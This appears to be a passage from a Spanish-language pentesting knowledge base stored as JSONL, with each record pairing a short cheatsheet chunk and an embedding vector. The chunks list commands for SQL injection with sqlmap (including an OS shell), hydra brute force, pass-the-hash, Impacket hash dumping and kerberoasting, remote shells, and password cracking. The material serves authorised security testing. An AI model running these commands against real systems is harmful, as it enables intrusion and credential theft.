-0.00085, 0.00224, -0.0129, -0.05813, 0.00963, -0.06255, -0.03892, 0.04644, 0.00916, -0.05082, -0.00751, 0.02763, -0.01184, 0.00201, 0.01489, -0.03043, 0.05298, -0.00483, -0.06909, -0.06896, 0.0159, 0.03317, 0.02729, -0.02824, -0.02363, -0.05802, -0.0132, -0.04325, 0.02402]} +{"tipo": "metodologia", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "texto": "# gobuster\ngobuster dir -u http://IP -w WL -x php,txt -t 40 -b 404\ngobuster dns -d dominio.com -w WL\ngobuster vhost -u http://IP -w WL --append-domain\n```", "v": [0.03123, -0.13413, -0.0532, -0.06516, 0.06925, -0.04609, -0.02525, -0.13464, -0.02953, 0.05498, 0.01635, -0.15334, -0.10038, -0.09399, -0.13185, -0.03401, 0.00236, -0.02803, -0.00811, -0.1225, 0.02605, 0.19137, -0.11789, 0.0609, 0.01948, 0.00815, -0.12957, -0.00011, -0.11374, -0.00716, -0.05362, -0.19117, -0.13602, 0.02662, -0.08845, -0.07776, 1e-05, 0.16191, 0.00891, 0.202, 0.02622, 0.03876, -0.05975, 0.09528, -0.06222, -0.00339, 0.04327, -0.19014, 0.00727, -0.07637, -0.08865, -0.06175, 0.00456, -0.0504, -0.01527, 0.02894, 0.13615, -0.1051, 0.03148, 0.07361, -0.0161, 0.00351, -0.16247, -0.06085, 0.02576, -0.04493, -0.01471, 0.05653, -0.09324, -0.02749, 0.01055, 0.02932, 0.03257, 0.00296, 0.14537, -0.01848, 0.09613, -0.06386, 0.15005, 0.02355, -0.0421, 0.03146, -0.02883, -0.01262, -0.01301, -0.03823, -0.02849, -0.23713, 0.03707, 0.0228, 0.13877, 0.03123, -0.00737, 0.01648, 0.0002, -0.13823, 0.06724, -0.02011, -0.03997, -0.12703, 0.03106, 0.15915, -0.08671, -0.01135, 0.12422, 0.01444, 0.03151, 0.05769, 0.02769, 0.00911, 0.02864, -0.00018, -0.02741, -0.02802, -0.00329, -0.02056, -0.06929, 0.00715, -0.00249, 0.01881, -0.09866, -0.05094, -0.06676, 0.03721, -0.03835, 0.03552, 0.03524, 0.01536, -0.05098, -0.14871, 0.01478, -0.05642, -0.02775, 0.04181, -0.01286, 0.09077, -0.01864, 0.0052, 0.05658, 0.05338, -0.02406, -0.02831, -0.04193, 0.06632, -0.02128, -0.02625, 0.06731, -0.07466, -0.02555, -0.01348, 0.00953, 0.03454, 0.06338, 0.02251, -0.02118, 0.04038, 0.02152, -0.02565, 0.01206, 0.00525, 0.03012, 0.01612, -0.00201, -0.01072, 0.03065, 0.01349, -0.00754, 0.02153, 0.0047, -0.04587, -0.07269, 0.01632, 0.01084, -0.05622, 0.02271, -0.0544, 0.08755, -0.02988, 0.00426, -0.04532, 0.06696, -0.09186, 0.0483, 0.01303, -0.01446, 0.05319, 0.02563, 0.01482, -0.04304, 0.00133, 0.07258, 0.01148, -0.03426, 0.04475, 0.0139, 0.00919, -0.00822, -0.06876, -0.02286, -0.00721, -0.09746, -0.01567, 0.03116, -0.04104, -0.04603, -0.04674, 0.0246, -0.00282, -0.01168, 0.0037, 0.00013, -0.01998, 0.00489, -0.10225, -0.04632, 0.03739, 0.03596, 0.00351, -0.00246, -0.01534, -0.035, 0.00424, -0.02087, -0.02162, 0.01384, 0.04881, 0.0395, -0.01142, 0.02091, -0.02334, -0.02705, 0.01846, -0.00637, -0.05537, 0.01751, -0.03375, -0.0371, -0.02497, 0.00248, 0.01464, -0.04139, -0.0118, -0.02122, 0.0321, -0.03358, -0.07917, -0.06868, 0.04114, 0.0132, 0.04134, 0.01055, -0.04273, -0.02897, 0.00195, -0.04869, 0.02272]} +{"tipo": "metodologia", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "texto": "## Inyeccion SQL automatica (sqlmap)\n\n```bash\nsqlmap -u \"http://IP/page?id=1\" --batch --dbs\nsqlmap -u \"http://IP/page?id=1\" -D basedatos --tables\nsqlmap -u \"http://IP/page?id=1\" -D basedatos -T users --dump\nsqlmap -r peticion.txt --batch --level 5 --risk 3 # peticion de Burp\nsqlmap -u URL --os-shell # a shell\nsqlmap -u URL --data \"user=1&pass=1\" -p user # POST\n```", "v": [0.00634, -0.15711, -0.07883, -0.13165, 0.01189, -0.32257, -0.05892, -0.11398, 0.01169, 0.16736, -0.09138, -0.11924, 0.0382, -0.14847, -0.16187, -0.04697, -0.06581, -0.03696, 0.03743, -0.11771, 0.06265, 0.07138, -0.12246, -0.0155, -0.13395, 0.12144, -0.08977, 0.09056, -0.15636, -0.01448, -0.04501, -0.09721, -0.14277, -0.03651, -0.07046, -0.07201, 0.02751, 0.02513, -0.06851, 0.02893, -0.09489, -0.04448, -0.17977, 0.07163, 0.06884, -0.0379, 0.05275, 0.00909, -0.0058, -0.13698, -0.11913, -0.02967, -0.13231, -0.01998, -0.11105, 0.04878, 0.17139, -0.0391, 0.05322, 0.0531, -0.07054, 0.00415, -0.08155, -0.05169, -0.00929, 0.04021, 0.0407, -0.01693, 0.04409, 0.11908, -0.02248, 0.02004, -0.04654, -0.04995, 0.0858, -0.04304, 0.06921, -0.05517, 0.04745, 0.06395, -0.13246, -0.05153, -0.11337, 0.06887, -0.00318, -0.0629, 0.0749, 0.00815, 0.0421, -0.02619, 0.03027, 0.01909, 0.0534, 0.01375, 0.01658, -0.10454, -0.02038, -0.0011, -0.00925, -0.04581, -0.05564, 0.01464, -0.06598, 0.07146, 0.13209, 0.05824, 0.05113, 0.0501, 0.01766, 0.05362, 0.08404, 0.00313, 0.00609, -0.03283, 0.03212, 0.02595, -0.04088, 0.04112, -0.0301, -0.04162, 0.05668, -0.0567, -0.04587, -0.00545, -0.02052, 0.02377, -0.0306, 0.07723, 0.02097, -0.0126, 0.01841, -0.01456, -0.09626, -0.01041, 0.02632, 0.03833, 0.00929, -0.02545, -0.0143, -0.0069, -0.0467, 0.06157, -0.04519, -0.00045, 0.03016, -0.03139, -0.02706, -0.05216, -0.08547, 0.04323, 0.01547, 0.06336, 0.04649, -0.04017, -0.03872, -0.01478, 0.06658, -0.05301, -0.03777, -0.00123, 0.01697, 0.06414, 0.0145, 0.11114, 0.03364, -0.00903, 0.00241, -0.01442, 0.07527, 0.00309, 0.0392, 0.00138, -0.01418, -0.12253, 0.01646, -0.07574, 0.00582, -0.03923, 0.0482, -0.04871, 0.03165, -0.07205, 0.04117, 0.00214, -0.00166, -0.03681, 0.02481, -0.04088, 0.03515, -0.0357, 0.05621, 0.05526, -0.01484, -0.01937, 0.02609, -0.01448, 0.0092, -0.03595, -0.01503, -0.02644, -0.04897, -0.03917, -0.0436, -0.00817, -0.03844, -0.01166, 0.02398, 0.0127, 0.00569, -0.04528, 0.06058, 0.01207, 0.01177, 0.00707, -0.04251, -0.05149, 0.0392, 0.02825, 0.0218, -0.00278, -0.0263, 0.04066, -0.00397, -0.02804, -0.00553, 0.01328, 0.05768, -0.01858, 0.03604, 0.0025, -0.00063, 0.03071, 0.02307, -0.05127, -0.01824, -0.01852, -0.00164, 0.01261, 0.00922, -0.06147, -0.05052, 0.02832, -0.03732, -0.03847, -0.01804, -0.03028, -0.0344, 0.02942, -0.00846, -0.07448, -0.03776, -0.06627, -0.03052, -0.01575, -0.00745, -0.02876]} +{"tipo": "metodologia", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "texto": "## Escaneo de vulnerabilidades (nuclei)\n\n```bash\nnuclei -u http://IP\nnuclei -l objetivos.txt -severity critical,high\nnuclei -u http://IP -t cves/ -t exposures/\nnuclei -u http://IP -tags sqli,xss,lfi\n```", "v": [0.17903, -0.17724, -0.08135, 0.04866, 0.16656, -0.24294, -0.09834, -0.09124, 0.03805, 0.15888, 0.0479, -0.06672, -0.06797, -0.04019, -0.1149, 0.01671, -0.05371, -0.07827, 0.06051, -0.00179, -0.04514, 0.01431, -0.16063, 0.05361, -0.11185, 0.1093, -0.1635, 0.10967, 0.0124, -0.07744, -0.12903, -0.15725, -0.03394, -0.09349, -0.04604, 0.03139, -0.05053, 0.05815, 0.02722, 0.06627, -0.00774, 0.02597, -0.10509, -0.01872, 0.12878, -0.04771, 0.0183, -0.11408, 0.10539, -0.17536, -0.02776, -0.02342, -0.09383, -0.00559, -0.09974, -0.0377, 0.12323, 0.01532, 0.04619, 0.02448, -0.10652, 0.13054, -0.04207, -0.15289, -0.02894, -0.02355, -0.05785, -0.0331, -0.13861, 0.01253, -0.01219, -0.04331, -0.04039, -0.01983, 0.04866, -0.00553, 0.03135, -0.0633, 0.04054, 0.02742, -0.01851, 0.01266, -0.03595, 0.00129, -0.12554, -0.03286, 0.10887, -0.08689, -0.06733, -0.00072, 0.07705, 0.0179, -0.00942, 0.05585, 0.03975, 0.00423, 0.01029, 0.07882, 0.0611, 0.08157, 0.01954, -0.00929, -0.11107, 0.11091, 0.10498, 0.0545, -0.01562, 0.011, 0.0747, 0.00722, 0.00871, -0.06837, 0.01849, -0.08633, -0.02207, 0.03323, -0.01172, -0.03012, -0.03268, -0.05206, 0.00251, 0.01302, 0.01947, 0.0297, -0.08412, -0.03834, -0.08261, 0.06739, 0.01793, -0.00593, -0.03996, 0.02219, -0.0219, 0.0243, -0.02411, 0.02532, -0.02215, -0.071, -0.01924, -0.02745, 0.08325, 0.00169, -0.02045, 0.03205, 0.02881, -0.03315, -0.01935, -0.06213, -0.0526, 0.03775, 0.04381, 0.03605, 0.04649, 0.01004, -0.08654, -0.08154, -0.03651, -0.07087, 0.05186, 0.05044, 0.00456, 0.06319, 0.00342, 0.02703, 0.0252, 0.08237, -0.01448, 0.00238, 0.05115, -0.00536, -0.02519, 0.00185, -0.04837, -0.06219, -0.00073, -0.07371, 0.05053, -0.0507, 0.05556, -0.02046, 0.00529, -0.02333, -0.02871, 0.02088, -0.04559, 0.00631, 0.01839, 0.00398, -0.01209, -0.02057, 0.0085, -0.01853, -0.05317, 0.04154, 0.05496, -0.06329, -0.0682, -0.06907, 0.04229, -0.01528, -0.01227, 0.00795, 0.02791, -0.01323, 0.00538, -0.02037, -0.07642, -0.011, -0.03934, -0.00886, 0.03394, -0.01239, 0.08415, 0.01199, -0.11905, -0.01555, 0.01033, 0.06433, 0.02817, 0.04261, 0.02108, 0.0299, 0.01267, -0.02905, -0.00866, -0.01307, 0.0216, -0.0303, 0.08113, 0.02429, -0.04047, 0.0586, -0.01786, -0.01532, 0.04864, 0.02146, -0.03292, -0.02301, -0.00388, -0.03897, 0.01935, 0.04593, -0.03902, -0.04239, -0.01476, -0.0428, -0.06974, 0.07113, 0.07665, -0.01763, -0.01193, -0.03309, 0.02788, -0.05419, 0.02294, -0.01663]} +{"tipo": "metodologia", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "texto": "## Fuerza bruta de credenciales (hydra)\n\n```bash\nhydra -l USER -P WL ssh://IP\nhydra -L users.txt -P WL IP ssh -t 4\nhydra -l USER -P WL IP http-post-form \"/login:user=^USER^&pass=^PASS^:F=incorrect\"\nhydra -l USER -P WL ftp://IP\nhydra -L users.txt -p PASS smb://IP # spraying\n```", "v": [0.05221, -0.18044, -0.15946, -0.0658, 0.13421, -0.19717, -0.06534, -0.22442, 0.03437, 0.14813, -0.00285, 0.05744, 0.10687, -0.09612, -0.09661, -0.06505, -0.0982, -0.02367, -0.00177, -0.15235, -0.03633, 0.2877, -0.13849, -0.06788, -0.13041, 0.08264, -0.09344, 0.0231, -0.11623, -0.17412, -0.03967, -0.02051, -0.08335, 0.11594, -0.15689, 0.02644, -0.03827, 0.16026, 0.1029, 0.16138, -0.03679, 0.14641, 0.10445, -0.00337, 0.09845, 0.02924, -0.00187, -0.06883, 0.05006, -0.05332, -0.07604, -0.04158, -0.14259, 0.015, -0.08826, -0.00424, 0.04889, -0.07026, -0.06091, 0.02271, -0.05439, 0.08152, -0.04378, -0.04697, -0.0422, -0.0203, -0.05152, -0.10071, -0.06237, 0.01734, -0.01647, 0.00604, -0.02503, 0.00601, 0.05422, 0.00171, -0.00836, -0.03272, 0.06769, 0.04402, -0.07455, -0.05424, -0.07658, -0.03552, -0.06539, -0.05347, 0.08421, -0.12626, 0.07101, -0.03124, 0.05725, 0.02766, -0.01919, 0.08742, 0.04214, -0.05358, -0.00852, 0.01459, -0.00928, -0.02502, -0.04166, 0.05095, -0.05299, 0.02442, 0.08739, 0.05277, 0.01426, 0.05936, 0.07041, 0.03976, 0.04464, -0.00419, -0.0183, -0.05825, 0.04621, -0.04522, -0.04622, -0.03952, -0.03358, -0.01576, 0.00127, -0.08484, -0.0019, 0.02723, -0.01956, 0.03215, 0.05318, 0.03197, -0.05676, -0.00535, 0.02324, 0.00711, -0.03242, -0.0049, 0.04431, 0.03104, 0.02156, 0.00728, -0.07116, 0.0913, 0.01086, -0.01699, -0.05628, 0.03687, 0.07154, -0.05278, 0.00684, -0.07546, -0.04094, -0.01399, 0.06851, 0.02474, 0.0343, 0.00646, -0.04208, 0.01213, 0.05466, -0.03032, -0.01836, 0.02847, -0.04675, 0.00902, 0.07323, 0.01839, -0.04099, 0.01865, -0.07501, -0.03694, 0.00716, -0.04642, 0.04214, 0.01254, -0.02802, -0.05643, 0.00995, -0.05581, 0.01926, 0.01664, -0.00472, 0.01794, 0.00998, -0.0538, 0.00617, 0.00737, -0.03923, -0.00856, -0.0084, -0.00172, 0.01676, -0.00773, 0.01888, 0.00362, -0.00464, 0.01767, 0.02037, 0.01393, -0.02241, -0.07426, 0.026, -0.0564, -0.01238, 0.00328, -0.00616, 0.00314, 0.01207, -0.03939, 0.00064, 0.04605, -0.02149, -0.01091, 0.03233, -0.03685, 0.03096, -0.05852, -0.02912, 0.00211, -0.02573, 0.00876, 0.01816, -0.01384, -0.06339, 0.03574, 0.01213, 0.01166, -0.05434, -0.04213, -0.01509, -0.04785, 0.00129, 0.01042, -0.01834, 0.01208, -0.03785, -0.06189, 0.01711, -0.01951, -0.03939, 0.02204, -0.00733, -0.0126, 0.01385, -0.0263, -0.00394, -0.03213, -0.06418, -0.0314, -0.05755, 0.05733, 0.01945, 0.00595, 0.00121, -0.05828, -0.0511, -0.04527, -0.03888, -0.02566]} +{"tipo": "metodologia", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "texto": "# CrackMapExec / NetExec — el navaja suiza de AD\ncrackmapexec smb IP -u USER -p PASS --shares\ncrackmapexec smb 10.0.0.0/24 -u USER -p PASS # barrido/spray\ncrackmapexec smb IP -u USER -H HASH --sam # pass-the-hash + dump SAM\ncrackmapexec winrm IP -u USER -p PASS -x \"whoami\"\nnetexec smb IP -u USER -p PASS --users --groups", "v": [-0.06036, -0.30677, -0.18332, -0.14436, -0.06071, -0.23854, -0.08841, -0.14755, -0.06766, 0.18259, -0.08572, 0.02159, 0.03385, -0.14817, -0.12383, 0.10158, -0.11005, 0.07398, 0.03007, 0.0325, 0.16029, 0.16254, -0.08812, -0.0065, 0.00382, 0.17566, -0.23558, 0.00418, -0.12219, -0.0714, -0.07206, 0.06531, -0.08325, -0.05386, -0.06159, -0.09559, 0.06175, -0.02717, 0.10489, 0.12967, 0.01513, -0.00306, -0.12631, -0.02095, 0.01399, -0.02499, 0.01609, -0.01226, 0.05807, -0.14149, -0.07752, 0.00668, -0.18663, 0.02132, -0.14004, 0.02474, 0.02517, 0.05743, -0.09809, -0.00647, -0.02888, 0.09495, 0.03108, 0.0015, 0.0364, -0.08043, -0.00327, -0.03613, -0.0172, 0.05162, -0.00109, 0.0464, 0.10006, -0.07562, 0.01358, -0.02225, 0.03277, -0.08169, 0.07188, 0.07004, 0.03184, 0.00308, -0.0499, 0.00467, -0.01146, 0.06378, 0.09037, -0.05752, 0.03184, -0.04571, 0.00104, 0.01326, 0.00869, 0.06444, 0.01149, -0.11965, 0.02285, 0.06554, -0.01832, -0.00282, -0.01125, -0.0599, -0.1643, 0.02545, 0.0586, 0.03841, 0.04149, 0.04663, 0.02096, 0.04392, 0.05905, 0.0396, -0.01724, 0.01372, 0.00725, -0.10354, -0.03586, -0.00112, -0.07116, -0.05384, 0.00136, -0.03038, 0.01491, -0.02271, -0.01981, -0.02539, 0.00658, 0.07112, -0.02661, -0.05748, 0.00961, -0.02441, -0.03115, -0.00846, -0.01439, -0.01339, 0.0604, -0.02036, -0.07386, 0.0409, -0.01777, 0.0343, -0.03573, 0.06481, 0.03011, -0.00955, -0.0311, 0.00406, -0.02307, 0.03347, 0.03802, 0.02103, 0.01727, 0.04311, -0.024, 0.04359, 0.00701, -0.01374, -0.01643, 0.03721, -0.06411, 0.0404, -0.02366, 0.0439, -0.02682, 0.05621, 0.02698, -0.01279, 0.01059, 0.00524, -0.01377, 0.03934, 0.02886, -0.01096, -0.02013, -0.08568, 0.02794, -0.0036, -0.00461, -0.02124, 0.01615, -0.05532, 0.0518, 0.04174, -0.03816, 0.00624, -0.00216, 0.04067, 0.0053, -0.04675, -0.01303, -0.00038, -0.00048, -0.02303, 0.04621, -0.0211, 0.02888, -0.0294, -0.02468, -0.02622, -0.02336, -0.02014, -0.01445, -0.02243, 0.01057, 0.00212, 0.02956, 0.04364, -0.01006, 0.01719, 0.01781, -0.00667, 0.00486, -0.02619, -0.03771, -0.02727, -0.00593, 0.04203, 0.01453, -0.03379, -0.01358, 0.04805, 0.01076, -0.02739, 0.00088, -0.03328, -0.02074, -0.00643, 0.04171, 0.01155, 0.02475, 0.02836, -0.02359, -0.02633, 0.0373, -0.02619, -0.03893, 0.01544, -0.01559, -0.01567, -0.02339, 0.00561, 0.01175, -0.00702, -0.02096, -0.02386, -0.04719, 0.00871, 0.02844, -0.00318, 0.02449, -0.03856, -0.02393, -0.02731, -0.01378, 0.02394]} +{"tipo": "metodologia", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "texto": "# Impacket\nimpacket-secretsdump DOM/USER:PASS@IP # dump de hashes\nimpacket-secretsdump -just-dc DOM/USER@IP -hashes :HASH # DCSync (con priv)\nimpacket-GetUserSPNs DOM/USER:PASS -dc-ip IP -request # kerberoasting\nimpacket-GetNPUsers DOM/ -usersfile users.txt -no-pass # AS-REP roasting\nimpacket-getTGT DOM/USER:PASS # pedir TGT (Pass-the-Ticket)\nimpacket-psexec DOM/USER:PASS@IP # shell SYSTEM\nimpacket-wmiexec DOM/USER:PASS@IP # shell sin tocar disco\nimpacket-smbexec DOM/USER@IP -hashes :HASH\nimpacket-mssqlclient DOM/USER:PASS@IP -windows-auth", "v": [-0.08689, -0.26222, -0.18976, -0.14764, 0.03449, -0.2136, -0.01207, -0.04677, -0.04303, 0.19375, -0.0625, 0.03122, -0.02393, -0.21983, -0.09507, -0.05049, 0.00615, 0.04918, 0.00767, -0.03678, 0.05817, 0.16294, -0.16284, -0.00456, 0.06745, 0.12767, -0.1049, 0.03284, -0.09196, -0.0396, -0.00973, -0.11269, -0.12809, -0.06964, -0.11046, -0.1813, -0.05548, 0.04869, 0.15636, 0.13725, 0.10002, 0.12171, -0.1314, 0.12085, -0.01248, -0.01785, -0.0047, -0.06587, 0.04199, -0.22294, -0.09306, 0.00724, -0.0938, 0.03636, -0.09656, 0.06476, 0.04432, -0.01363, -0.06506, 0.04816, -0.0474, 0.08615, -0.00563, 0.02149, 0.12876, -0.04839, -0.06894, -0.06976, -0.02598, 0.00057, -0.03518, 0.02892, 0.07821, 0.01297, 0.04201, -0.01809, 0.03465, -0.04515, 0.07233, 0.12343, 0.00678, -0.02732, -0.08773, 0.01323, -0.02024, -0.03175, 0.03899, -0.07456, 0.03799, -0.05027, 0.13421, 0.05185, -0.00107, 0.07133, 0.07966, -0.06862, 0.03411, 0.01494, -0.06649, -0.05754, -0.05621, 0.05275, -0.08143, 0.00702, 0.06259, 0.00144, 0.0877, 0.02933, 0.07457, 0.04729, 0.01966, -0.00829, -0.00141, -0.01399, 0.01103, -0.01689, -0.00743, 0.00547, -0.01462, -0.064, 0.06244, -0.0009, 0.00506, -0.03844, 0.01593, 0.00204, 0.03933, 0.04201, 0.01477, -0.03094, -0.02098, -0.0829, -0.02883, 0.06434, 0.06416, -0.00901, -0.01279, -0.05633, -0.08618, 0.0428, 0.0399, -0.02095, -0.04664, 0.09331, 0.04388, -0.02735, 0.00909, 0.00192, -0.04495, 0.0144, 0.07082, 0.01649, -0.0129, -0.01302, -0.02432, 0.02947, -0.01728, -0.00718, -0.02716, 0.00252, -0.0232, 0.05698, -0.01829, 0.01695, 0.05846, 0.03217, 0.00965, 0.00812, -0.00183, -0.00381, -0.01758, -0.02219, 0.01691, -0.00433, -0.06646, -0.04802, 0.04912, 0.00267, 0.02968, -0.03305, 0.02375, -0.03932, 0.04594, 0.04277, -0.02803, -0.02705, 0.01922, 0.01003, -0.00713, -0.02906, 0.04892, 0.0439, 0.03521, -0.01128, 0.04513, 0.00989, 0.01914, -0.02636, 0.0056, 0.02428, -0.03253, 0.02325, -0.02878, 0.00477, -0.04875, -0.01767, -0.02538, 0.01581, -0.04393, -0.02131, 0.02898, -0.02705, 0.03667, -0.04429, -0.02023, 0.02344, -0.02154, 0.03393, 0.00231, 0.00486, 0.00183, 0.03857, 0.01547, -0.02588, -0.00302, 0.00363, -0.01088, -0.00824, 0.02839, -0.00527, 0.01343, 0.02521, -0.04784, -0.02313, 0.00439, -0.01061, -0.03625, 0.03474, -0.00499, 0.03294, -0.00746, -0.02994, 0.03849, -0.01519, 0.00852, -0.00766, -0.04389, 0.03885, 0.04423, 0.02888, 0.01421, -0.03298, -0.05985, -0.01336, -0.0408, 0.01839]} +{"tipo": "metodologia", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "texto": "# BloodHound (recoleccion)\nbloodhound-python -d DOM -u USER -p PASS -ns IP -c all", "v": [-0.12943, -0.30027, -0.06707, -0.08684, 0.03949, -0.10846, 0.06632, -0.10156, -0.03978, 0.07143, -0.04992, -0.02224, 0.02138, -0.12606, -0.15517, -0.08367, -0.132, 0.03139, -0.01889, -0.04367, -0.13486, 0.06587, -0.17678, 0.06031, 0.09317, 0.18556, -0.0517, 0.06116, -0.03705, -0.02839, -0.05793, -0.10935, -0.05589, -0.01233, -0.12983, -0.09264, -0.0668, 0.14776, 0.04495, 0.16474, -0.11983, 0.01579, -0.03946, -0.0325, -0.00318, -0.02144, -0.04005, -0.00834, 0.07092, -0.1188, -0.00457, 0.0451, -0.19649, -0.13037, -0.11613, 0.07188, 0.02878, -0.01143, -0.01647, 0.02062, -0.01754, -0.01648, 0.0086, 0.00534, 0.04604, -0.05471, -0.07137, -0.05037, -0.00898, 0.02509, -0.0245, 0.08064, -0.01588, -0.00425, 0.05169, -0.08543, 0.00132, -0.0573, 0.12793, 0.06966, -0.00705, 0.00995, -0.04319, 0.01139, 0.04915, -0.0357, 0.13467, -0.08348, 0.14523, 0.00498, 0.09632, -0.00148, 0.02411, 0.06291, 0.03924, -0.03933, 0.03272, -0.02929, -0.01757, -0.04262, 0.01052, 0.04402, -0.1325, 0.05777, 0.10305, 0.042, -0.01518, 0.03191, 0.03785, -0.04635, 0.03912, -0.04321, -0.1001, -0.00936, -0.05849, -0.0311, 0.06463, 0.07659, 0.03193, -0.03437, 0.03299, -0.00567, 0.00714, 0.00256, -0.06657, 0.011, 0.00682, 0.01793, -0.02928, -0.03587, -0.06605, 0.02859, -0.05369, -0.04569, -0.0184, 0.03556, -0.01024, -0.05712, -0.01807, -0.01134, -0.05907, -0.01515, 0.00823, 0.06214, 0.07256, -0.03483, -0.02408, -0.06214, -0.03241, -0.00203, 0.0667, 0.05283, 0.06807, 0.01733, -0.03643, 0.04195, -0.01834, 0.02781, -0.04957, 0.01532, -0.03069, 0.01437, -0.01213, -0.04583, -0.04418, 0.12016, -0.00984, -0.00383, 0.01029, -0.0706, 0.0242, -0.03994, -0.02712, 0.02203, -0.06227, -0.05848, 0.08435, -0.06374, -0.00465, 0.02481, 0.05773, -0.02467, -0.04002, 0.05034, 0.07387, -0.00556, 0.01783, 0.02941, 0.00533, -0.08349, 0.10727, 0.10351, 0.06379, 0.00184, 0.01705, 0.02561, 0.07353, -0.03353, 0.05272, -0.02998, -0.02565, -0.00536, -0.07899, 0.05595, 0.0026, 0.03502, -0.00705, 0.04852, -0.097, 0.01503, -0.02638, -0.03243, 0.03326, -0.03147, 0.02711, -0.00446, -0.02587, 0.01318, -0.04301, -0.00616, -0.003, 0.05065, 0.02424, 0.03491, -0.05185, 0.00988, 0.03483, -0.02305, 0.10675, -0.03227, -0.03916, 0.05531, -0.09273, -0.01686, -0.02306, 0.06185, -0.01223, 0.00833, -0.00017, 0.0267, 0.02931, -0.00485, 0.03004, -0.01937, 0.01978, -0.0462, -0.00111, -0.00172, 0.03341, 0.00495, 0.03152, -0.05334, -0.02646, 0.0013, -0.01678, 0.01566]} +{"tipo": "metodologia", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "texto": "# Evil-WinRM (shell interactiva Windows)\nevil-winrm -i IP -u USER -p PASS\nevil-winrm -i IP -u USER -H HASH # pass-the-hash\n```", "v": [-0.05598, -0.25459, -0.10249, -0.07303, 0.0943, -0.10905, -0.12163, -0.12682, 0.08747, 0.06328, 0.03235, -0.08037, -0.02534, -0.00251, -0.05581, 0.0897, -0.05885, 0.00987, -0.01983, 0.01009, -0.00872, 0.27813, -0.15612, 0.01982, -0.04105, 0.15919, -0.26509, 0.16644, -0.08106, -0.13107, -0.07292, -0.08054, -0.091, -0.04585, -0.14257, -0.02334, -0.03293, 0.12393, 0.1322, 0.19849, 0.06492, 0.1429, -0.05589, 0.06935, 0.08034, -0.10087, 0.01737, -0.04848, 0.15011, -0.01325, -0.07669, 0.01723, -0.15195, -0.08747, 0.07906, -0.04829, -0.07286, 0.03234, -0.11698, -0.06135, -0.05586, 0.0427, -0.02378, 0.07957, 0.0674, 0.01081, -0.10147, -0.08335, -0.03029, 0.079, 0.00082, 0.04235, 0.07323, -0.04035, 0.07748, -0.04401, -0.06369, -0.08654, 0.08142, -0.00037, -0.01929, -0.01471, -0.00174, -0.01713, -0.00952, -0.00021, 0.05948, -0.11669, 0.0556, -0.09509, 0.05137, -0.01807, -0.00784, 0.0419, 0.0457, -0.13758, 0.00509, 0.00438, -0.07965, 0.0012, -0.10962, -0.04636, -0.10333, 0.02687, 0.04404, 0.05131, 0.04341, 0.04045, 0.08583, 0.02347, 0.02326, -0.03569, 0.00171, -0.01238, -0.00324, 0.03457, -0.03005, 0.02545, -0.01914, -0.01354, 0.01059, 9e-05, -0.04228, 0.03652, 0.00254, -0.03501, 0.02211, 0.01501, -0.03904, -0.03531, 0.00712, -0.06027, -0.02809, 0.01432, -0.02384, 0.00977, 0.01429, -0.04424, -0.03717, 0.04876, 0.06515, 0.0352, -0.04666, 0.04922, 0.01266, -0.03982, 0.0221, 0.05603, -0.03495, -0.00652, 0.02388, 0.02073, 0.03617, -0.02049, -0.02434, 0.02405, 0.02622, 0.03573, 0.00132, 0.03882, -0.02142, 0.03335, -0.00803, 0.01047, -0.01807, 0.00669, -0.02397, -0.00108, 0.02748, -0.07907, -0.00683, 0.03045, -0.00575, -0.01057, -0.05635, -0.01758, 0.04792, 0.02555, -0.02144, -0.04627, 0.0141, -0.03813, 0.07251, 0.00056, -0.06022, 0.03278, -0.01089, 0.03187, 0.00825, -0.02689, 0.00643, -0.00219, -0.01547, 0.00317, 0.02516, -0.01158, 0.03156, -0.06041, 0.00462, -0.03554, -0.02828, 0.00621, -0.00133, 0.03391, 0.00528, 0.02342, 0.02075, 0.04622, 0.04041, -0.00998, 0.00962, 0.02015, 0.01795, -0.03591, -0.00554, -0.05788, -0.02601, -0.00176, 0.00391, -0.02041, -0.00612, 0.04418, 0.00423, -0.016, -0.01979, -0.02284, -0.07457, 0.00068, 0.01053, -0.04868, -0.0234, 0.02455, -0.02136, -0.03843, -0.02874, -0.02838, -0.02874, 0.00772, -0.02161, 0.00938, -0.04559, -0.00566, 0.04688, -0.06099, 0.02146, -0.01499, -0.04054, 0.02452, 0.00152, 0.01972, -0.03998, -0.02921, -0.04012, -0.01722, -0.05243, 0.0158]} +{"tipo": "metodologia", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "texto": "# John\njohn --wordlist=WL hashes.txt\njohn --wordlist=WL --format=NT hashes.txt\nzip2john fichero.zip > hash; john hash\nssh2john id_rsa > hash; john --wordlist=WL hash", "v": [0.06919, -0.23137, 0.02412, -0.01616, 0.06164, -0.16288, -0.18646, -0.05993, 0.08639, 0.18362, -0.02705, -0.08795, 0.06793, 0.10395, 0.03826, 0.07351, 0.09357, -0.01879, -0.08764, 0.00293, -0.15504, 0.09244, -0.14881, -0.06929, -0.01596, 0.01517, -0.07646, 0.10825, -0.21021, 0.04927, 0.02407, -0.15155, -0.03615, 0.13611, -0.07414, 0.20984, 0.04897, 0.21971, -0.01127, 0.22066, -0.02281, 0.12329, -0.10628, 0.11859, -0.0749, -0.00918, 0.00334, 0.02025, 0.03025, -0.00461, 0.05481, -0.00434, -0.24671, 0.02517, 0.00561, -0.09926, 0.10554, 